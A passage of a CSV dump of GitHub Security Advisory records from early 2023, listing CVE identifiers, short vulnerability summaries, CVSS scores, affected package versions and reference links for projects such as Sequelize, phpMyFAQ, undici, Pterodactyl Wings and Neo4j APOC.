'https://github.com/WWBN/AVideo/security/advisories/GHSA-pgvh-p3g4-86jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30842'}, {'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/commit/236228f15a9a31be5a0e60f05dac043682e49a5e'}, {'type': 'PACKAGE', 'url': 'https://github.com/WWBN/AVideo'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T01:32:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-prjg-28jg-m3p5,2023-03-03T23:25:32Z,2023-02-24T03:30:14Z,,['CVE-2023-0994'],RosarioSIS Improper Access Control vulnerability,Improper Access Control in GitHub repository francoisjacquet/rosariosis prior to 10.8.2.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.8.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0994'}, {'type': 'WEB', 'url': 'https://github.com/francoisjacquet/rosariosis/commit/630d3e3d78270db8dbcbfe87db265bc3e70c5a76'}, {'type': 'PACKAGE', 'url': 'https://github.com/francoisjacquet/rosariosis'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a281c586-9b97-4d17-88ff-ca91bb4c45ad'}]","{'cwe_ids': ['CWE-200', 'CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:00Z', 'nvd_published_at': '2023-02-24T02:15:00Z'}" 1.4.0,GHSA-vqfx-gj96-3w95,2023-02-23T16:58:56Z,2023-02-23T16:58:56Z,,['CVE-2023-22579'],Unsafe fall-through in getWhereConditions,"### Impact Providing an invalid value to the `where` option of a query caused Sequelize to ignore that option instead of throwing an error. A finder call like the following did not throw an error: ```ts User.findAll({ where: new Date(), }); ``` As this option is typically used with plain javascript objects, be aware that this only happens at the top level of this option. ### Patches This issue has been patched in [`sequelize@6.28.1`](https://github.com/sequelize/sequelize/pull/15699) & [`@sequelize/core@7.0.0.alpha-20`](https://github.com/sequelize/sequelize/pull/15375) ### References A discussion thread about this issue is open at https://github.com/sequelize/sequelize/discussions/15698 CVE: CVE-2023-22579 Snyk: https://security.snyk.io/vuln/SNYK-JS-SEQUELIZE-3324090","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.28.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@sequelize/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0-alpha.20'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/security/advisories/GHSA-vqfx-gj96-3w95'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22579'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/15375'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/15699'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/CVE-2023-22579'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/DIVD-2022-00020/'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/discussions/15698'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v6.28.1'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20'}]","{'cwe_ids': ['CWE-843'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T16:58:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-jwr6-75xh-jh5j,2023-02-23T22:14:18Z,2023-02-15T21:30:30Z,,['CVE-2023-23850'],Synopsys Jenkins Coverity Plugin has Incorrect Default Permissions,"Synopsys Coverity Plugin 3.0.2 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability. An enumeration of credentials IDs in Synopsys Coverity Plugin 3.0.3 requires the appropriate permissions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:synopsys-coverity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23850'}, {'type': 'WEB', 'url': 'https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(1)'}]","{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T22:14:18Z', 'nvd_published_at': '2023-02-15T19:15:00Z'}" 1.4.0,GHSA-wjrj-jc3w-ppfw,2023-02-24T16:01:53Z,2023-02-12T15:30:25Z,,['CVE-2023-0792'],Code Injection in thorsten/phpmyfaq,Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0792'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/d8964568d69488de02f0a0a58acc822eeb5c3cb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/9e21156b-ab1d-4c60-88ef-8c9f3e2feb7f'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:03:49Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-3vrc-rrpw-r5pw,2023-03-01T20:46:06Z,2023-02-19T18:30:21Z,,['CVE-2014-125087'],java-xmlbuilder vulnerable to XML External Entity Reference,A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.jamesmurty.utils:java-xmlbuilder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-125087'}, {'type': 'WEB', 'url': 'https://github.com/jmurty/java-xmlbuilder/issues/6'}, {'type': 'WEB', 'url': 'https://github.com/jmurty/java-xmlbuilder/commit/e6fddca201790abab4f2c274341c0bb8835c3e73'}, {'type': 'PACKAGE', 'url': 'https://github.com/jmurty/java-xmlbuilder'}, {'type': 'WEB', 'url': 'https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221480'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221480'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T20:46:06Z', 'nvd_published_at': '2023-02-19T17:15:00Z'}" 1.4.0,GHSA-22j4-qc48-j8f8,2023-02-08T22:42:21Z,2023-02-01T15:30:20Z,,['CVE-2023-24997'],Apache InLong vulnerable to Deserialization of Untrusted Data vulnerability,Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7223 to solve it.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:inlong'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'last_affected': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24997'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7223'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/nxvtxq7oxhwyzo9ty2hqz8rvh5r7ngd8'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T17:00:10Z', 'nvd_published_at': '2023-02-01T15:15:00Z'}" 1.4.0,GHSA-3w96-p6vh-c298,2023-02-14T21:25:17Z,2023-02-14T15:30:27Z,,['CVE-2023-0827'],Cross-site Scripting in pimcore,Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 1.5.17.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0827'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/f4050586136cb4c44e3d6042111a1b87b340df95'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/75bc7d07-46a7-4ed9-a405-af4fc47fb422'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:25:17Z', 'nvd_published_at': '2023-02-14T13:15:00Z'}" 1.4.0,GHSA-hjmr-xm25-36mh,2023-02-16T21:52:55Z,2023-02-08T09:30:24Z,,['CVE-2023-0743'],Answer subject to Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Generic in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0743'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/860b1a3bd8cfaa8827e6e6f50ab1d98fa4c2c816'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/366cf8bb-19f6-4388-b089-d0a260efd863'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:39:02Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}" 1.4.0,GHSA-pc2q-jcxq-rjrr,2023-02-08T22:40:18Z,2023-02-08T18:18:05Z,,['CVE-2023-25164'],Sensitive Information leak via Script File in TinaCMS,"### Impact Sensitive Information leaked via script File in TinaCMS. Sites building with @tinacms/cli >= 1.0.0 && < 1.0.9 that store sensitive values in process.env var are impacted. If you're on a version prior to 1.0.0 this vulnerability does not affect you. If your Tina-enabled website has sensitive credentials stored as environment variables (eg. Algolia API keys) you should rotate those keys immediately. ### Patches This issue has been patched in @tinacms/cli@1.0.9 ### Workarounds Upgrading, and rotating secure & exposed keys is required for the proper fix. ### References https://github.com/tinacms/tinacms/pull/3584","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@tinacms/cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinacms/tinacms/security/advisories/GHSA-pc2q-jcxq-rjrr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25164'}, {'type': 'WEB', 'url': 'https://github.com/tinacms/tinacms/pull/3584'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinacms/tinacms'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:18:05Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-r58m-v5pr-jhhq,2023-02-23T22:05:42Z,2023-02-16T00:30:28Z,,['CVE-2020-19825'],Cross-site Scripting in kimai/kimai,"Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kimai/kimai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19825'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/pull/962/files'}, {'type': 'WEB', 'url': 'https://github.com/kimai/kimai/pull/962'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2'}, {'type': 'WEB', 'url': 'https://github.com/kimai/kimai/releases/tag/1.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/kimai/kimai1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:10:11Z', 'nvd_published_at': '2023-02-15T22:15:00Z'}" 1.4.0,GHSA-c57v-hc7m-8px2,2023-03-03T23:26:50Z,2023-02-23T21:30:16Z,,['CVE-2023-0044'],Cross-site Scripting in Quarkus,If the Quarkus Form Authentication session cookie Path attribute is set to `/` then a cross-site attack may be initiated which might lead to the Information Disclosure. This attack can be prevented with the Quarkus CSRF Prevention feature.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-vertx-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.13.7.Final'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0044'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-0044'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2158081'}, {'type': 'PACKAGE', 'url': 'https://github.com/quarkusio/quarkus'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T22:15:09Z', 'nvd_published_at': '2023-02-23T20:15:00Z'}" 1.4.0,GHSA-p2gm-ffr3-w2xw,2023-02-08T18:17:06Z,2023-02-08T18:17:06Z,,[],Nervos CKB vulnerable to low-resource flood DDoS attacks through network message,"### Workarounds * forbid request genesis through network request * forbid requesting duplicate data through network request ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.101.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-p2gm-ffr3-w2xw'}, {'type': 'PACKAGE', 'url': 'https://github.com/nervosnetwork/ckb'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:17:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-fjj4-2q73-jvgc,2023-02-08T18:15:28Z,2023-02-08T18:15:28Z,,[],Nervos CKB calculation of program load cycles may be missed when executing in resume mode,"### Impact The calculation of program load cycles may be missed when executing in resume mode. Since the script execution order is now determined, this issue does not cause network splitting. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.100.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-fjj4-2q73-jvgc'}, {'type': 'PACKAGE', 'url': 'https://github.com/nervosnetwork/ckb'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:15:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-2275-rpf5-xv8h,2023-02-08T22:40:04Z,2023-02-01T06:30:30Z,,['CVE-2022-25906'],is-http2 vulnerable to Improper Input Validation,"All versions of the package is-http2 are vulnerable to Command Injection due to missing input sanitization or other checks, and sandboxes being employed to the isH2 function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-http2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25906'}, {'type': 'PACKAGE', 'url': 'https://github.com/stefanjudis/is-http2'}, {'type': 'WEB', 'url': 'https://github.com/stefanjudis/is-http2/blob/master/index.js#L23'}, {'type': 'WEB', 'url': 'https://github.com/stefanjudis/is-http2/blob/master/index.js%23L23'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-ISHTTP2-3153878'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T17:13:07Z', 'nvd_published_at': '2023-02-01T05:15:00Z'}" 1.4.0,GHSA-r6cw-356h-mvwg,2023-02-23T22:08:30Z,2023-02-12T15:30:25Z,,['CVE-2023-0788'],Code Injection in thorsten/phpmyfaq,Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0788'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/77b42b9d0be3990ee7389207a71528b304b03039'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/808d5452-607c-4af1-812f-26c49faf3e61'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:03:33Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-rj7m-2p3g-fjxg,2023-02-13T20:51:27Z,2023-02-06T06:30:25Z,,['CVE-2022-25855'],create-choo-app3 is vulnerable to Command Injection via the devInstall function,All versions of the package create-choo-app3 are vulnerable to Command Injection via the devInstall function due to improper user-input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'create-choo-app3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.12.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25855'}, {'type': 'PACKAGE', 'url': 'https://github.com/choojs/create-choo-app'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-CREATECHOOAPP3-3157951'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T20:06:02Z', 'nvd_published_at': '2023-02-06T05:15:00Z'}" 1.4.0,GHSA-x4qr-2fvf-3mr5,2023-03-01T01:47:38Z,2023-02-08T22:17:06Z,,['CVE-2023-0286'],Vulnerable OpenSSL included in cryptography wheels,"pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 0.8.1-39.0.0 are vulnerable to a security issue. More details about the vulnerabilities themselves can be found in https://www.openssl.org/news/secadv/20221213.txt and https://www.openssl.org/news/secadv/20230207.txt. If you are building cryptography source (""sdist"") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.1'}, {'fixed': '39.0.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.25.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0286'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2023-0286'}, {'type': 'WEB', 'url': 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt'}, {'type': 'WEB', 'url': 'https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0006.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-843'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:17:06Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-p8r3-83r8-jwj5,2023-02-08T22:40:37Z,2023-02-08T18:19:56Z,,['CVE-2023-25152'],Pterodactyl Wings contains UNIX Symbolic Link (Symlink) Following,"### Impact This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can be used to create new files and on the host system that previously did not exist, potentially allowing attackers to change their resource allocations, promote their containers to privileged mode, or potentially add ssh authorized keys to allow the attacker access to a remote shell on the target machine. In order to use this exploit, an attacker must have an existing ""server"" allocated and controlled by Wings. Information on how the exploitation of this vulnerability works will be released on February 24th, 2023 in North America. ### Patches This vulnerability has been resolved in version `v1.11.3` of Wings, and has been back-ported to the 1.7 release series in `v1.7.3`. Anyone running `v1.11.x` should upgrade to `v1.11.3` and anyone running `v1.7.x` should upgrade to `v1.7.3`. ### Workarounds None at this time.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25152'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/commit/dac9685298c3c1c49b3109fa4241aa88272b9f14'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/releases/tag/v1.11.3'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/releases/tag/v1.7.3'}]","{'cwe_ids': ['CWE-59', 'CWE-61'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:19:56Z', 'nvd_published_at': '2023-02-08T19:15:00Z'}" 1.4.0,GHSA-5r9g-qh6m-jxff,2023-02-16T20:46:30Z,2023-02-16T20:46:30Z,,['CVE-2023-23936'],CRLF Injection in Nodejs ‘undici’ via host,"### Impact undici library does not protect `host` HTTP header from CRLF injection vulnerabilities. ### Patches This issue was patched in Undici v5.19.1. ### Workarounds Sanitize the `headers.host` string before passing to undici. ### References Reported at https://hackerone.com/reports/1820955. ### Credits Thank you to Zhipeng Zhang ([@timon8](https://hackerone.com/timon8)) for reporting this vulnerability. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'undici'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '5.19.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nodejs/undici/security/advisories/GHSA-5r9g-qh6m-jxff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23936'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/undici/commit/a2eff05401358f6595138df963837c24348f2034'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1820955'}, {'type': 'PACKAGE', 'url': 'https://github.com/nodejs/undici'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/undici/releases/tag/v5.19.1'}]","{'cwe_ids': ['CWE-74', 'CWE-93'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T20:46:30Z', 'nvd_published_at': '2023-02-16T18:15:00Z'}" 1.4.0,GHSA-5h8c-8ccp-8gmh,2023-02-08T21:48:39Z,2023-02-01T06:30:30Z,,['CVE-2022-25916'],mt7688-wiscan is vulnerable to Command Injection due to improper input sanitization,Versions of the package mt7688-wiscan before 0.8.3 are vulnerable to Command Injection due to improper input sanitization in the 'wiscan.scan' function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mt7688-wiscan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25916'}, {'type': 'WEB', 'url': 'https://github.com/simenkid/mt7688-wiscan/commit/ff6d6567c65b4e972916a8fbc4533212f20a2fa5'}, {'type': 'PACKAGE', 'url': 'https://github.com/simenkid/mt7688-wiscan'}, {'type': 'WEB', 'url': 'https://github.com/simenkid/mt7688-wiscan/blob/master/index.js%23L22'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-MT7688WISCAN-3177394'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:48:39Z', 'nvd_published_at': '2023-02-01T05:15:00Z'}" 1.4.0,GHSA-6wxg-wh7f-rqpr,2023-04-14T21:35:17Z,2023-02-16T20:46:49Z,,['CVE-2023-23926'],XML External Entity (XXE) vulnerability in apoc.import.graphml,"### Impact A XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this. External entities can be used to 